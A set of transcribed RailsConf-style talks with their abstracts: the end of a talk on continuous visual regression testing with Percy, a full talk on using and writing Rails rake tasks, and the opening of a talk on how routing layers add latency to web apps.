to just be able to be like, this is what it looks like. I know that that's right. Oh, look, it's changed. Is it still right? You know, that's kind of what you really want to test with those visualizations. And then going further, what I really want here is a visual review process alongside code review. And we're going to talk a little bit more about that. So if this was all so easy, why aren't we all doing this right now? Right? And definitely somebody has said that if it wasn't easy, or if it was easy, it wouldn't be hard. This is, it gets really complicated, right? There's a bunch of problems. And I'm going to sort of hand wave over a bunch of the problems. But I sort of bucket them in three different categories. Tooling and workflows, performance, and non-deterministic rendering. So on the tooling front, it's kind of hard, right? There are some open source projects that do this right now. Phantom CSS is a great example of one, right? But it sort of presents all of your visual changes as a ton of individual test failures, right? And that's kind of a lot of information and a lot of failures for things that are, it just sort of, it confuses the line between like something being flaky and, or a change that you want it to be and like an actual test failure, right? Or for example, you probably shouldn't have to require that you're manually storing these baseline images like in your Git repo, right? Like that's a big workflow tooling process that most of us are probably just not going to do. It's going to work, right? The performance one, I think this is the big one across the spectrum of all the open source tools, all the proprietary tools, all the everything. This is the big one that probably prevents us from doing this right now. The examples I showed are somewhat contrived, right? They're pretty simple pages. But in the real world, you know, I have some pages that are, when you render a full page screenshot of them, they're 30,000 pixels high, 40,000 pixels high, and that's not crazy, right? So rendering and screenshotting, that kind of page and uploading it, storing it can take 15 seconds just to render it and another five to diff it. So if you have a hundred of these tests that you want to do, and they're all run serially, that's 30 minutes you're adding to your test suite, right? And none of us want to do that. Your feature specs, if you're writing feature specs already, they're already too slow, right? And they're already too flaky. So that's a hard one. And I think the performance is actually the biggest problem here. And then non-deterministic rendering, which we'll talk about. So I'm sort of hand waving over the other problems. If you want to talk about this more, I would love to. So on the non-deterministic rendering front, simply, like, there's a bunch of things that change in browsers, right? We're not just doing static pages. So animations is the big obvious one, right? So take this, like, pure CSS animation, right? If you visually diff this a bunch of times, what diff are you going to get? You know, you might get this diff. You might get this diff. You might get this diff, right? These aren't useful to you. They're just kind of noise. So for example, in Percy, what we do to do this is we actually freeze animations by injecting this particular CSS style into the page that tries to stop all of these animations from happening so you can just say nothing has changed, right? And if you want to know more about that, I have a post on blog.percy.io about how we actually do that. Or another one. Dynamic data is a big problem, right? If you have anything on your page that changes in your tests, especially, you're going to see a visual diff from those. So like a date picker is a good example, right? And you can sort of fix these with like fixture data instead of faker data. You can sort of like move in a direction where you're having more like static deterministic things that you're using in tests, which I think is a relatively good fix. But this is still a big problem. I have some ideas about how to address this kind of thing. So old test browsers. So like we talked about before, what you see on the right here is what was rendered by Capybara WebKit. And what you see on the left is like what's rendered by Firefox, right? And these are not the same thing. There's like not the border image doesn't work and the like, you know, the web font here is not a web font on this one. And the problem with this is that often the browsers, the old test browsers that we're using underneath are not really modern in any fashion, right? Like Capybara WebKit is an old fork of WebKit that doesn't support these things. If you phantom.js all the way up until the new like 2.0 version didn't, doesn't support these things too. It was a fork of Chrome 14 from five years ago, right? It doesn't render the modern web. It also has 1700 open GitHub issues that are like basically untree-aged. So go for it. So that's a really hard problem, right? And then some other problems like you can't really control for is this sort of like sub-pixel anti-aliasing problems. The way that text is represented on a page is not totally deterministic, right? These things might shift by one pixel. GPUs don't actually guarantee in some way is that like floating point operations will always come out to be the same thing, right? So if you have a gradient that's rendered on one machine and you try to render that same gradient on another machine, they may not be pixel perfect. They probably won't be. If you compile some code with different optimization flags, GPU floating point operations will be non-deterministic, right? So we look at pages as if they are the same all the time, but actually getting them to be pixel perfect is a big problem. Some tools attempt to solve this with some sort of like open CV computer vision researchy things where you try to say like, oh, is this a button, has the button moved and you sort of try to derive the page back from the image, right? So that's hard. So PDIFs are only half the battle here, right? So back to our main goal, like what if we could see every pixel changed in any UI state in every PR, right? And this is really what I think is the difference between like visual regression testing sometimes and what I frame as continuous visual integration, right? In the same way that like your unit tests are not the entire thing you're doing to test your system and you need processes to like be doing continuous integration, you need to be merging changes with all of your other developers all the time, you need to be testing them instantly in CI as fast and as parallelization, you know, as parallelized as possible. There's a difference between like doing visual regression testing sometimes and continuous visual integration and these are sort of the big problem spaces that create that. So that would require, being able to do this would require that things are really fast, right? There's basically as fast as your test suite. You need to be able to handle complex UI states. You can't just test a static page. We're not just here to just like look at all of our static pages. We need to be able to test components and all the different components states. And it needs to be continuously integrated into your workflow on basically every commit, right? In my mind, this can't be saved until you're either in production and even staging is like a little bit too late for me, right? Like I want this to happen basically all the time. So I'm going to talk a little bit in the last part of this talk about how we sort of architected Percy to try to address these problems. So here's like, here's how Percy integrates into like an RSpec feature spec. It's basically the same thing that we created, right? You have a feature spec, visit some page, it does some action on the page. And then what you do is you just drop in, you know, Percy, Kaby, Baro, snapshot the page, give it a name, say this is the home page, right? So what's that actually doing underneath, right? When these things get pushed up to Percy, like are we pushing up images? And I say that with question marks because those will come along with all the problems that we noticed before, right? So we don't want to do that. So what we actually do here is we push up DOM snapshots. And if you think about this, like, it makes a lot of sense because the most efficient, the most like lossless encoding format for a website is not an image of the website or a video of the website, it's the website, right? It's your assets, it's your DOM state that you've created. So we actually push up the DOM and HTML snapshots and technically push up SHA-256 fingerprinted versions of those assets so we actually never upload things twice. So the first thing, the first run might be slow, but then after that, it basically, my goal is basically to say like, you know, zero time is spent in your test suite after the first run, but it's not totally true. So then we do a bunch of like hand wavy magic underneath that to actually say like, you know, we push that stuff into storage, we can talk to GitHub and commit statuses, we can coordinate work with this like Percy Hub and actually, this is the big part where that actually addresses most of the performance issues is we can parallelize this, right? So you've pushed us up a bunch of DOM snapshots as fast as your test suite can go and what we actually do underneath is we run them as fast as your concurrency limit allows. So we can actually totally out of band of your test suite be parallelizing and running and rendering these DOM snapshots in a deterministic rendering environment and then be able to like, you know, show those to you in a nice way. So this was the sort of like main innovation that helps I think this thing come to fruition. So as of yesterday, actually I wanted to like talk about this, we have hit a million visual disks rendered in Percy as of yesterday, so I was really like proud of that milestone. So here's a couple of quick Percy examples. I talked to some of our customers and got permission to show you just a couple of pages. Just to see just like what Percy the product looks like and how I've sort of been trying to address this problem. So here's Charity Waters build, CharityWater.org and they have some amazing, they're very designed, such a team, they're big, big Rails apps, they've pushed 162 total snapshots on every build basically and this particular build which is called footer, updating the new footer markup had 96 visual disks, right? And you can sort of like go through each one of these pages and just be like, oh look, look at all these footer changes and then this is the diff and I can click that and say, oh great, so I noticed that this footer is different on all of these pages and this is a lot to go through, right? So I just recently added this overview mode where I can just see all of my pages all at once and be like, okay, and just confirm, really quickly do a visual review and just confirm that all of these changes are the ones that I want, right? These are the visual changes that I have actually, we want to make as part of this PR. So here's another example. So this page is basically like we're updating, the PR is new press page and we're trying to update our new press page, right? And this one is just the first iteration of that PR where they remove some CSS styles and like, oh look, this page is totally broken, right? And they would never want to launch this page but it gives them this sort of iterative review process where they can go here and they can say, oh look, this is what our page looks like currently in this PR and then also the important signal of none of the other pages have changed, have changed based on this CSS change, right? And then you can go through and you can sort of see like, what are the other pages here in this app? So on the workflow and tooling problem, so this is the last thing I'll show you. So we just provide this as like a CI service, right? We just like, as your tests run, they actually push information up to Percy and then Percy marks this PR with another CI service right here. Percy, VisualDiff's found, right, and we can just click details, jump right to the page and be like, oh look, this is the state of this PR, right? This is that background change that we made. And I can go through and I can decide like, yes, this is the right visual change that was intentional for this PR, let's go ahead and mark it. So I'll do a little, this is the one HTTP request that my demo or that my talk requires, so let's hope that this works. So okay, so like I go here and I'm like, great, this is, I'm doing a visual review right from GitHub. I'm going to do things, this is what I want, click approve, and then GitHub will, you know, mark that status as green, right? So now this sort of gives you like a lightweight visual review process for all of the different UI states of your app and at the PR level, right, not like at some later stage. So yeah, that's basically what this DOM snap shutting mechanism has helped us sort of like tackle a bunch of those different problems. So that's it. I just want you to take away from this talk that like visual testing is possible. It's a thing. We should be doing it. It's a new way to think about testing and it can help give you deployment confidence, right? I think of this as like the last stage of the CD pipeline where you just need to like in your acceptance phase, you need to make sure that all of this stuff is looking correct, right? And you need to be able to approve it. And that this is still a very manual step, but we can probably automate quite a bit of this. And then also there's like a lot more work to be done to make this a mainstream engineering practice. One last thing. So because of this DOM snap shutting model, I'm able to, I just want to give you a sneak peek of something I'm working on over the next couple of months. I want to be able to do this for Ember regression tests or for Ember tests. So if you are an Ember user, I would love to talk to you. Just email me micatpercy.io and let's talk about like getting you as a beta tester of this in Ember test. Because I actually think that this is probably the world where this makes the most sense, right? Like not everyone is writing Rails regression tests or Rails feature specs in a lot of ways because they're really hard to write sometimes. But we are writing a lot of JavaScript tests nowadays, right? And as we sort of further separate our worlds to like this is just an API back in and this is like a single page app front end and those lines become clearer and clearer, we're going to have a lot more of these tests. And so to be able to get this kind of power all we need to do is be able to send up those DOM snapshots and render them. So if you're interested in that, please let me know and I can like I'd love to get your hands on the beta. So thanks so much. Yeah, the question is like what is the baseline? How is the baseline created? So basically I think you can do that a bunch of different ways. I usually just pick like master. Whatever master has last created, that is our baseline, right? And then we provide a mechanism in Percy where you can say like I want a more manual version where I actually approve a master build and that becomes the baseline. So I think you've got to have kind of both. But yeah, basically I think if you're really doing like master is always green and always deployable then you should always be testing against master. Yeah, so we don't right now, right? I think the question was do you do cross browser testing? So I think that that would be a great evolution of this kind of testing, right, is doing more cross browser testing. But it comes with all those problems I mentioned too and you'd be surprised to learn that most browsers don't provide a full page screenshot API and Firefox is the main one. So I think that you can get like 90% of the benefits of visual testing with like one good modern browser. But then that would be a great evolution of this kind of idea would be to do cross browser testing. Yeah, that's a good question. The question is like what tech stack are we using? It's all custom built on Google Cloud Platform. I've like dockerized all of the environments. It's basically a Rails API, a full strictly Ember front end and the workers like run XVFB which is a virtual frame buffer. It's all on Linux. It runs Firefox. Yeah, it's running Firefox. Yeah, it's running Firefox. Yeah. Oh, so you're asking about Percy access control. Who can access that Percy page? Right now I just tie it to like GitHub auth. So if you can see the repo in GitHub, if you have access like team collaborator access of the GitHub repo, you can see it in Percy. And anybody who can see that can hit approve. Yeah, I haven't built any like complex like role authentication kind of things yet. So yeah, I totally missed that part. So let me just do that quickly for the people who remain. Okay, so part of this thing is we have all of these different like screenshots at a particular width, right? But we have the original DOM of these. So we can just resize the browser to a smaller width and actually show it. So here's like responsive testing. So here they have a 320 PX version of this. So now I can see the footer change in all of those different ones, right? And I can like full width this and like this is what this page looks like, you know, quote on mobile basically just like at this, at this breakpoint size, right? So the DOM snapshotting model also takes care of that in that you can just like render it a different width. This is not testing on the actual device, right? But it is like, you know, giving you at least the responsive side of it. The question was, can you disable the local test run and only have it on CI? That's actually the default behavior. And then I've had some people ask like, I want to disable it for only specifically this branch. So there's an environment variable we provide called Percy enable which you can set to zero or one and it will force that environment to be on or off. Cool. Thanks so much. Thank you. Thank you.
|
Unit testing is mostly a solved problem, but how do you write tests for the visual side of your app—the part that your users actually see and interact with? How do you stop visual bugs from reaching your users? We will dive deep into visual regression testing, a fast-growing technique for testing apps pixel-by-pixel. We will integrate perceptual diffs in Rails feature specs, and learn how to visually test even complex UI states. We will show tools and techniques for continuous visual integration on every commit, and learn how to introduce team visual reviews right alongside code reviews.
|
10.5446/31506 (DOI)
|
Alright. Thank you all for coming after lunch. I know there's lots of good choices. It's hard. So many tracks and workshops going at the same time. And so I appreciate y'all being here. It's good to see so many seats taken. I'm Barrett Clark. I've done Ruby for about a decade. I like to run. I currently work at Saber Labs, where I do research and build prototypes really to try to make travel suck less. Saber is a travel company. And I like to be outside as much as possible. But we're not here to talk about me. Today we're here to talk about rake. So let's get started. Rake is a Ruby scripting utility really used to streamline tasks, repetitive tedious tasks. It can be considered a Ruby version of make, the Unix build automation tool. Similar to make, we have a rake file like the make file. But the rake file is written in Ruby. So you can do all these things in Ruby. It was created by Jim Weirich, who unfortunately passed away in February of 2014. And I still miss him. I miss his spirit. I miss his influence. His energy. This was one of his last tweets. There was a new TV show called rake. But it was confusing because it wasn't about Ruby or build automation, which is unfortunate because maybe it could have been a good show. Okay. Rake can help us manage our databases. If you've done any rails, then you've probably used database migrations and you've used rake. And I would say really this is probably the biggest killer feature in rails, database migrations. So here we have a migration from the rails 5 beta. This was C3. So of course we're going to make a blog. Oops, it works. We've got our timestamps created. We'll have two fields, a title and a body. It wouldn't be great if all blogs were short. These are just strings. So we want to create our table. To do that, we'll use bundle exec rake db migrate. You'll note the inclusion there of bundle exec rake is a Ruby scripting utility. So you could just run rake. But we're in a rails app and we want this to work in the context of our rails apps gem file and bundler can help us with that. And so bundle exec rake db migrate. So we run it and you see I'm going to run the create post migration and it's going to create a table, posts and we're good. Oh, but I changed my mind. Maybe you're indecisive like me and you change fields, change the names, add fields. You don't really know where this is going quite yet. So I want to add a permalink to my table because we want to tweet about all the piffy things we have to say. We want people to come find our blog. So we could create a new migration which is reasonable but we can also edit our existing migration. And I'll talk here in a minute about why and when we make those choices. But let's just say that it's totally okay and we're going to just put this new field in there. So there's a couple of ways that we can revert this thing and rerun it. The first, we can just use db rollback bundle exec rake db rollback. And so that's just going to reverse the migration. So ActiveRecord understands how to undo lots of things that it can't do. Create table is one of the things that it knows how to undo. If it's not something that is a reversible migration, you have to separate up and down separately and so then it would run the down method. So we do that, bundle exec rake db rollback and we say, okay, we've got this create post migration that we're going to revert so we're going to drop the table. And dropping a table, you're going to delete the table. And when you delete a table, you delete all of this data also. But that's okay, this is development, right? You wouldn't do this in production. The other thing we can do is bundle exec rake db migrate redo. And this is great. It'll roll it back and then roll it forward again. So you can see we're going to take that create post migration, we'll drop the table, and then we'll create the table. So we're going to delete the data, we're going to delete the table, it's going to delete all the data, and it's going to recreate the table. So when it does it, you'll have a fresh table that has all the stuff in it except for the data. This is super handy. I use this a lot. Oh, change my mind again. We've got this blog post, we've got the permalink, and it's going to go viral because, I mean, we have incredible stuff to say, right? So we're going to add an index to the posts table on the permalink so that we don't table scan every time we look up that field because table scanning is bad, right? But we've introduced a new database object. And so when we try to roll it back, Active Record is going to say, okay, well, I need to undo all the things that I did. So I'm going to drop the index and then I'm going to drop the table. Now, of course, if you drop the table, it would drop all of its objects if you just did it in the database, but Active Record is going to be thorough. And so it's going to explicitly drop everything that is created. And we're going to have a bad time. Don't worry, that guy survives. He's fine. So we need a different strategy. We're going to drop the database and recreate it, then re migrate bundle exec rake, db drop, db create, db migrate. And you can see we can run multiple tasks serially one after another. And yes, this is heavy handed. This is totally scorched earth here. But again, we're in development. We're doing early development. We just created this table. We don't really know where we're going yet. And so it's okay. So you're asking, Barrett, when can I change? Can I just change the migration and re run it? And of course the answer in computer science is always, it depends. So limitations, new fields are totally fine. You don't have any new database objects. And so you can rerun that new objects. So a new index of foreign key or for whatever reason, you wanted to create a second table in that migration. That's when you'd have to drop the database and start over again. And if you've already committed and pushed, don't change it. That's a bad thing. So I'll tweak a migration and rerun it when I'm in initial development. And I'm still trying to figure out what I'm doing. But once I've set that stake in the ground, then it's fixed. And we're going to have to create new migrations. But I don't want to create 10 migrations while I'm trying to figure out, you know, what needs to be in this table. So let's keep going with rake and database management. And we're going to talk about advanced database seeding. When you create a new Rails app, you get a seeds file and it's empty. And it looks like this has these comments. And it tells you, I've got these tasks that I can run for you, db seed, db setup. And when you run, let's say you run the db seed task, well, it's going to take whatever's in there and run it. So the example here is we're going to create a couple of movies and then we're going to create a movie character. And that's great. But the problem is each time we run this, it's going to rerun everything that's in there. And Star Wars and all of the rings, you know, they're trilogies, but we don't need multiple Star Wars movies in the database. So Active Record has our back, though. Instead, we can use, instead of create, we can use first or create. So where we have this where condition, when that is not satisfied, when it cannot find a record, it'll create it. Otherwise, it'll just return whatever instance or instances it finds. We're using first or create, so it'll actually return the object or nil. Postgres 96 recently shipped and we finally got Upsert, which is update or insert. So who knows, maybe let's keep our eyes peeled for updates in Active Record to support that. But first or create is going to be what you want here and then you can safely rerun this db seed task. So why not rake all the things all the time? Because we can run multiple tasks serially, one after another. Why not make sure the database is completely up to date every time? We can safely run the db migrate task several times. And if there is nothing to be done, then it just won't do anything. And we can now safely run our seeds task multiple times because if it doesn't have anything it needs to create, it just won't do anything. We can also create a custom rake task. This one's going to take a csv file and load it in. The csv file has a header row that happens to match the fields in the table, which is handy. I've got a custom converter there, so any field that is blank, the quote quote empty string, will be converted to a null that the database understands. So there's a bunch of stuff there, let's go through it piece by piece. We've got a rake task and it's in the db seed namespace. You can nest the namespaces and so that's how you get db seed and then the task is import airports. It's going to load the rails environment. We're going to look and see if there are any airports already loaded. If there are any records, we're going to assume that this task is already running and we don't have to do anything. We could do that first to create and that would work just fine, but there are lots of airports, right? That would be a lot of lookups. It's going to create a lot of objects it doesn't need to create and we're going to generate a lot of log and we don't really want that either. So we'll just be naive and assume if there are any airports then we're good. csv out of the ruby standard library is really handy. So for each given a file name, we'll open the file and read it in line by line, record by record. We've told it that there's a header row, so it'll take that row and it takes each row and basically makes it a hash. So the header, the field names will be the key values and then the hash values will be the data from that particular record. And I'm going to convert it to a symbol just so that it looks like what I'm expecting a hash key to look like. I prefer my hash keys to be symbols. The custom converter there, this is also a really handy thing that csv offers us. So if there is data in that field, if it's not null, but it is empty, empty string quote quote, then let's make it null, otherwise we'll just return the field value. So that way we get good null values that the database understands instead of a table chalk full of just empty strings. Nobody needs that. So we'll pump that hash into airport create because the field names are the same as the column headers, you can pump a hash directly into active record create and it'll create the records for you. You're good to go. Again, we could have done first to create here, but I don't want to do 8000 lookups. Wait for that to happen, record by record and generate all that log. That's just a lot of unnecessary work. So here it is again, custom rate task to load csv file and import it if it needs to be. To invoke that rate task, bundle exec because we want this to run with the Rails apps gem file as context, rake db seed import airports. It's in the db seed namespace so that becomes part of the name. So we've been plugging away and maybe we did do first to create and so our logs are starting to get out of hand a little bit. So we have too much log. Well, we've got a rate task for that in Rails. So you take a look at your logs directory and this one's actually not very big, but you can see that test log is significantly bigger than the development log. You're running your tests a lot. Maybe you've got a guard running and so every time you save, it reruns your tests and so it can quickly grow. So bundle exec rake log clear will go through and it'll open up and truncate each file in that log directory. It won't give you any output. It would be nice if it told you what files it's clearing and how much space it saved. It won't do any of that. But Rails is open source so we could hack on it. So I don't know. Come talk to me afterwards if you want. So let's rake all the things. Because we can run multiple tasks serially, why not make sure our database is up to date and our logs are clear every time. So bundle exec rake db migrate db seed log clear. Again, we can safely rerun the migrate task and we can safely rerun the seed task. Rails can also tell us stuff. We can see all the notes that we sprinkled for ourselves throughout our code. Bundle exec rake notes. It'll go through and look at all the to dos and fix me's that you've put in all the files. There's also an optimized tag. I haven't actually used that. Maybe I should. So we do that in a test project here that I made bundle exec rake notes and we see in that posts model I've got a to do. As you can see the line number is line two and then on line three I've got to fix me that just says this is an example. Fix me. And then in the seeds file I've got it to do for myself to create some blog posts. So you can see the line number and the file of each of your notable notes. But documentation goes beyond comments. Your app can tell you things about itself. What does it know how to do? How do you use it? That routes file and the routes, that's one of the first places that I look when I pick up a legacy Rails app or just a Rails app that I didn't write or that I forgot that I wrote. So let's look at a routes file. This is an old one from an old work app. You can see there we've got a couple of Git actions on a gate controller. We've got a readings resource. A resource is probably an API that we've exposed for another app to talk to. And that resource gives us the seven golden actions for free. Index create new edit, show, update and destroy. And then we also have to find a route route. So somebody just goes, so you know, localhost 3000 or myawesomeapp.com then they'll get something. So bundling is accurate. Grouts, we see all the routes and we see those two Git actions on the gates controller. We see the seven golden actions for readings and we see our route route. Now that readings index is actually not going to return anything. It's just a 204 and empty. Okay. There's nobody. So seeing the routes, the named routes, seeing the URLs that you have in your app is really handy. We didn't specify any custom names in any of our routes but you could do that. So then in your app you would refer to these, you could refer to these routes as gate manifest, URL or gate manifest. I think route. I think you can do that. And so you could put that in link to or redirect all those things. As your app gets big and you have more routes, you might want to filter. Well, because this is just a command line scripting utility, we can chain commands together. We can pipe the output into another command. And so we'll do bundle exec rake routes. We'll pipe that through grep with the keyword gate so we can see any route that has that gate keyword anywhere in the line. So we have two gate routes. With a big routes file, this is really handy. Okay. We can also use rake to update our projects. And this is a little bit like source re. Bundle exec rake rails update. You run that and it's potentially heavy handed again. So it's going to go through and it's going to look at all the files in your app or maybe your app version and it will tell you all the new files that it needs to create or any changes in files that you have already. So this is the Rails 4 syntax. Rails 5, they've changed it to bundle exec rake app update. So we run that on one of our apps. And you can see it's going to go through a bunch of files and say, well, we already got that. It wants to create a new secret key. We don't care. It gets the environment development. And we see that the active job queue name, they want it to be changed. Instead of being camel case, we're going to snake case it. And do we want to accept it? Well, I haven't made any other changes in this file. And so it's safe to accept it. So you can see I say yes. Here are the options that you get. File by file, yes, you can accept, no, you can choose to not accept it. Or you can just step on everything. Or you can see a diff. So I, what I like to do is get that diff. And if it's a file that I've made changes in, then I'll decide how I want to approach. Maybe I'll copy in the change or maybe I'll just step on the file and look at a get diff and see what I just stepped on. It's safe to run this and see what needs to be changed without stepping on anything. But you've also got your project under version control. So if you do step on something, you can always revert. So remember rake is a Ruby script in utility. So it's not just for Rails. We can do this off the rails. All you have to do is include the rake gem and have a rake file. Similarly, we can use bundler in just a plain old Ruby project. So here's a very simple rake task. Got a description. This task says hello. The task is hello and it's going to put hello. So we run that rake hello and it says hello. It's a very friendly task, right? Well, at a second task world and I put them in a namespace now because they're similar tasks. So a namespace is a way that we can group like tasks together and it becomes part of the name like you saw before. So rake railsconf hello says hello. Rake railsconf world says world. Got a third task here and this one has some dependencies. And it doesn't have a block. It doesn't have its own body because it doesn't need to do anything in addition. So when you run this phrase task, it's first going to go run the hello task and then it's going to run the world task and then if it had a body, it would run whatever was in that block. So we run that rake railsconf phrase. It's going to run the hello task and say hello. It's going to run the world task and it's going to put world. Cool. So now we have a fourth task. We're getting tricky here. This task takes in a parameter. It takes an argument. It only has one argument to rename and in that block, it's going to come in an args hash. Similar to in a controller where you have the params hash, we have the args hash and the rake thing. You could call it whatever you want. You define the variables there for the block. But the idiomatic thing is we call it args. So we're going to say rake railsconf custom hello, barrett and it's going to say hello, barrett. Hi. Here's how we would run it in a Ruby script. You can invoke rake tasks from inside Ruby. All you have to do is require rake, load the rake file and then rake task, the name of the task, dot invoke and if the rake task has parameters, they would go in the parentheses there for invoke. This also shows how to use bundler in a plain old Ruby script. Again, just require bundler, bundler dot require. We could have had the rake file in the gem file, the rake gem defined in the gem file and then it would have been required but I wanted to show it separately. So we run that Ruby script in the context of our gem file, bundle exec Ruby rake include dot rb and it says hello, barrett because that's what we told it to say. Finally we add a default task there at the we bottom. If you just run rake, it's going to complain because it says I don't know what to do. I don't have a default task. So we give it a default task. It's on the global namespace for that rake file and so the default task is railsconf hello. So we run rake, it says hello. We can ask our rake file, what's so great about you and it'll say rake minus capital T, it will list out the tasks and it says, well, here's all the tasks that I have. This is where that description line comes in handy. Any description that you, any rake task that doesn't have a description, it won't list. If it's still there, it'll still run, you can totally use it. It just won't be listed out in the rake minus capital T. Rail ships with a bunch of rake tasks. And it's just open source, right? So we can look at them. They're in the rail ties gem and lib rails tasks. And so those are all of the rake files that ship with rails. Because it's open source, we can go play in the code. So here is that log task. And you can see all it does, it's really simple. It just looks in the logs directory, gets a list of the files and trunk it. So this is where we would go if we wanted to do something like print out the name of the file as it was doing something, do a file stat to see how much space we were saving. This is where that would go. And we could submit a pull request if we decided that we liked it and maybe it gets pulled into the next version of rails. So remember rake is an automation tool. We can streamline common tasks. So remember when we did that, when we raked all the things, db migrate, db seed, log clear. Well, we can streamline that. We can create a custom rake task that just does that for us. And rails has our back. There's a rails generator for custom rake tasks. So when you run one of the generators, or when you just run rails g, rails generate, it'll tell you, well, here's what I know how to do. And then you run the rails g for task and it says, well, here's how you use this thing. So let's generate a task, put it in the db namespace and call the task streamlined. And you see it'll create a file in lib tasks. And it'll be called db.rake. When you do that, you get this empty file. There's a lot of boilerplate already taken care of for you. You've got a description, you just have to fill in the to do. And then you get the task streamlined. It's going to load the rails environment for you. And then all you have to do is fill in the block. What do you want your task to do? We have everything we need. It's perfect. So I'm going to fill it in. I'm going to say the description is, well, it's going to run all these things. And then I change it to the hash rocket, the older hash syntax, because I just like that better. But if you like the new syntax, that's cool. We can still be friends. It's fine. It's fine. So this streamline will now have three dependencies. We no longer need to load the rails environment because db migrate will do that for us. So streamline will run db migrate, db seed, and log clear. And we don't need it to do anything else. And so we don't need that block. We don't need that body. We can ask our rails app now, what do you know how to do? And we can filter it for any rate task that has the word db in anywhere in the line. And they can say, oh, hey, cool. I've got this new task rate db streamline. It won't actually be highlighted. I did that so you can see it's actually there. And so we're good to go. We can run our new rate task. And it works. So it's going to migrate the table. So we'll create the table, run the seeds. We don't have any output for that. And then look at the log directory. It's empty. So it did all the things. We're good to go. Other streamlining TDM sorts of things. Seattle microservice set up one time and we used off-token to communicate between the services. And it was a calculated token that had a timestamp in it. And so to test one of the child services that had to have a valid token, it was kind of a pain. So I made a rate task to calculate a valid off-token so I could just use curl to test those. Docker management. Before we had Docker Machine back in like the fig days, I wrote a big rake file to help with all the container management. And I actually still use some of those tasks to help with cleanup. We saw loading a seed file into the database. But we can also load a full production database into our local development database. Here's a custom rake task that will download production database from Heroku and load it into your local development database. It's just a series of three tasks. One is dependent on the other. So let's break them down. Here's the first task. And we've got capture backups. Going to load the Rails environment and then it's going to ask Heroku to capture a PG backup. So Heroku is going to just go make a PG dump and store that somewhere. We can then download. We've got this download backup task that's going to go ask the capture backup task to capture backup. And then we'll use curl to download that dump. So we'll have it now on the local file system. And then we have our third task load and it's going to use PG load, PG restore to load that dump file. Taking in all the variables from the Rails environment. And then it's just a temporary file. We don't really need it in our code base. So we'll delete that dump file. We can always run it again. So custom rate test to download production Heroku data and load it locally. But standard security warning. If you have sensitive data in your production database then maybe you don't want to walk around with that on your laptop. It is handy. There is value in being able to perf test code against real production data. So if you want to profile your code or if you want to do some perf testing this is a really good way to do that or just use a staging environment. Also a good idea. So we can do that. So we talked about rake for database management and maintenance. We've talked about rake for project management and maintenance. And we've talked about rake for just plain old Ruby projects. Rake can help us make our projects more manageable and make our life more serene. That's Lake Champlain in Burlington Vermont. One of my favorite places. If you have questions I would love to talk with you come up. Talk to me afterwards. I've also nearly finished writing this book data visualization toolkit. Rough cut will be available online soon on Safari books. So if data is or GIS are your thing or if you want them to be your thing then we can talk about that as well. Thank you. Thank you.
|
Although bundle exec rake db:migrate is probably the single biggest killer feature in Rails, there is a lot more to rake. Rails offers several rake tasks to help with everyday project management, like redoing a migration because you changed your mind on one of the columns, clearing your log files because they get so big, and listing out the TODOs and FIXMEs. What's even more awesome that all that is that you can create your own rake tasks. Got a tedious command-line process? Write a rake task for it!
|
10.5446/31508 (DOI)
|
Thank you for coming to my talk. That's very kind and generous of you to listen to me talk at you about things. My talk is called Don't Forget the Network. Your app is slower than you think. I'm going to talk about things that you probably haven't thought about yet about how people use your application and about ways that people using your application are having a worse time than you think that they are. I'm sorry. I don't really know of any good way to talk about this except by probably making you feel bad for your users. So brace yourselves and you'll be fine. Before I get to that, introduce myself. My name is Andre Arco. I'm indirect on almost all the things. That is an avatar of me that now that I'm looking at it, that's one avatar old. I'm sorry. I'll get it fixed by the time I post the slides on speaker deck. I wrote a book called The Ruby Way, the third edition. I co-authored the third edition of The Ruby Way. It's actually pretty great. I learned Ruby from the very first edition of The Ruby Way and it was my favorite book except that I couldn't tell anyone to use it because it was about Ruby 1.8. And so I updated it and it covers Ruby 2.2 and 2.3 and if you buy it in a couple years, you can use it to prop up your monitor and make it higher like I do with my copy of The Ruby Way second edition. I work at Cloud City Development. We do mobile and web application development from scratch but mostly what I do is join teams that need someone really senior to help with their Rails app or their front end app. I've done a lot of Ember stuff. And I guess if listening to this talk makes you feel like you could use someone to help you feel less bad, talk to me later. That is literally my job. I work on something else you may have heard of called Bundler. I mean, I've worked on Bundler for a really long time but it's been a really great experience to work on open source and to kind of interact with every aspect of the Ruby community. People do things with Bundler that I would never in a million years have imagined that people do with Ruby and then I get to help them try to solve their problems. And if we've put a lot of effort into making it, I guess, easy or, I don't know about easy, but easier to get started contributing to open source through Bundler than a lot of other open source projects. And if you're interested in contributing to open source, definitely talk to me later or tweet at me and I would love to help you start contributing to open source. The last thing that I spend time doing is called Ruby Together. Oh, I'm even wearing a shirt. And Ruby Together is a non-profit trade association for Ruby people and companies that pays developers to work on Bundler and on RubyGems so that you all can run Bundle Install and it actually works. And without companies and people giving us money, like RubyGems.org just wouldn't stay up and you wouldn't be able to Bundle Install because that stuff, like we have to work on it every week to keep it up. It's servers, it's software, it all breaks all the time. And the only reason that we're able to keep it working now that there are so many people using Ruby and using RubyGems is because companies like Stripe and Basecamp and New Relic and Airbnb are willing to give us money so that we can pay developers to make sure that it all works. We haven't let RubyGems.org go down in the last year, which is super great, but at the rate usage is going up, we need more people to give us money. If you are a manager or if you can talk to your manager about Ruby Together, that would be awesome. So the network and how your app is slower than you think. I guess, routing is a thing that your app has, even if you didn't think that it does. I guess at one point there was a very widely shared article on RAP Geniuses blog about how Heroku's router was a sham and everything was awful. I guess, unfortunately, whether you're on Heroku or not, your app has a router and it's probably making things worse than you think they are. So let's talk about how that is and why that is and what you can do about it. So routing, what I mean is the part of your application's infrastructure that takes the request from the outside world and load balances it or forwards it or somehow gets it through your infrastructure until it finally reaches your Rails app server. And then your Rails app server does some stuff and tells you, hey, this took 45 milliseconds and then it has to go back through Nginx or HAProxy or Nginx and HAProxy or whatever it is that you use back to the outside internet and then across the entire outside internet back to the user who was trying to find that thing out in the first place. So how exactly does this work? Like, maybe you haven't thought about this. I totally don't blame you on your laptop. This is a non-issue, right? In development, this is routing you. You talk to your app. It's great, actually. Unfortunately, in production, you need more than one app server and people are coming from a lot of different places. And so this is just like a generic Rails app. Not every Rails app will look like this, but almost every Rails app looks like this. You have some outside level load balancer. You have some inside level. Here's how we split requests up across all of the unicorns or all of the Pumas or all of the whatever. And every single one of those lines adds time to what your users see that you never saw while you were working on the program on your laptop. So question time. Raise your hand if you know how long your routing layer takes. That's what I thought. I have given this, I have asked this question in various different talks about eight times. I totally expected no one to raise their hands. I've literally had one person ever raise their hand. Eight talks. That's probably like, I don't know, closing in on a thousand people now. I once asked this question at a 